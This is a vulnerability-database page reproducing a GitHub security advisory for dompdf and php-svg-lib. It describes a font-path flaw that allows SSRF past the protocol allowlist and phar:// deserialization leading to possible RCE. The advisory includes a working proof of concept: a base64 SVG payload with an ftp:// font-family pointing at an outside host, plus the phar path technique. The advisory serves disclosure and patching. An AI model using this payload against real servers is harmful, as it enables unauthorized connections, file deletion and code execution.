Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
githubGitHub Advisory DatabaseGHSA-97M3-52WR-XVV2
HistoryFeb 22, 2024 - 6:15 p.m.

Dompdf's usage of vulnerable version of phenx/php-svg-lib leads to restriction bypass and potential RCE

2024-02-2218:15:41
CWE-73
CWE-502
GitHub Advisory Database
github.com
12
dompdf
vulnerable
php-svg-lib
restriction bypass
potential rce
metadata unserializing
php < 8.0
ssrf
cpdf
file_exists
phar://
ftp
allowed protocols
inline css
font-family
arbitrary url
arbitrary protocols
svg
unserialize
arbitrary file deletion
remote code execution

7.5 High

AI Score

Confidence

High

JSON

Summary

A lack of sanitization/check in the font path returned by php-svg-lib, in the case of a inline CSS font defined, that will be used by Cpdf to open a font will be passed to a file_exists call, which is sufficient to trigger metadata unserializing on a PHAR file, through the phar:// URL handler on PHP < 8.0. On other versions, it might be used as a way to get a SSRF through, for example, ftp, not restricted by authorized protocols configured on dompdf.

Details

The problem lies on the openFont function of the lib/Cpdf.php library, when the $font variable passed by php-svg-lib isn’t checked correctly. A path is crafted through $name and $dir, which are two values that can be controlled through CSS :

$name = basename($font);
$dir = dirname($font);
[...]
$metrics_name = "$name.ufm";
[...]

if (!isset($this-&gt;fonts[$font]) && file_exists("$dir/$metrics_name")) {

Passing a font named phar:///foo/bar/baz.phar/test will set the value of $name to test and $dir to phar:///foo/bar/baz.phar, which once reconstructed will call file_exists on phar:///foo/bar/baz.phar/test.ufm. That allows to deserialize the baz.phar arbitrary file that contains a test.ufm file in the archive.

PoC

Consider the following, minimal PHP code :

&lt;?php
require('vendor/autoload.php');

use Dompdf\Dompdf;
$dompdf = new Dompdf();
$dompdf-&gt;loadHtml($_GET['payload']);
$dompdf-&gt;setPaper('A4', 'landscape');
$options = $dompdf-&gt;getOptions();
$options-&gt;setAllowedProtocols([]);
$dompdf-&gt;render();
$dompdf-&gt;stream();

With payload being this html file :

&lt;html&gt;
<img src="data:image/png;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+DQo8c3ZnIHhtbG5zOnN2Zz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIj4NCiAgICA8dGV4dCB4PSIyMCIgeT0iMzUiIHN0eWxlPSJjb2xvcjpyZWQ7Zm9udC1mYW1pbHk6ZnRwOi8vYmxha2wuaXM6MjEveC95OyI+TXk8L3RleHQ+DQo8L3N2Zz4="></img>
&lt;/html&gt;

with the base64 image being :

&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;
&lt;svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"&gt;
    &lt;text x="20" y="35" style="color:red;font-family:ftp://blakl.is:21/x/y;"&gt;My&lt;/text&gt;
&lt;/svg&gt;

A connection on ftp://blakl.is:21/ will occur, bypassing the allowed protocols.

Impact

An attacker might be able to exploit the vulnerability to call arbitrary URL with arbitrary protocols, if they can force dompdf to parse a SVG with an inline CSS property using a malicious font-family. In PHP versions before 8.0.0, it leads to arbitrary unserialize, that will leads at the very least to an arbitrary file deletion, and might leads to remote code execution, depending on classes that are available.

Affected configurations

Vulners
Node
phenxphp-svg-libRange<0.5.2
CPENameOperatorVersion
phenx/php-svg-liblt0.5.2

7.5 High

AI Score

Confidence

High

JSON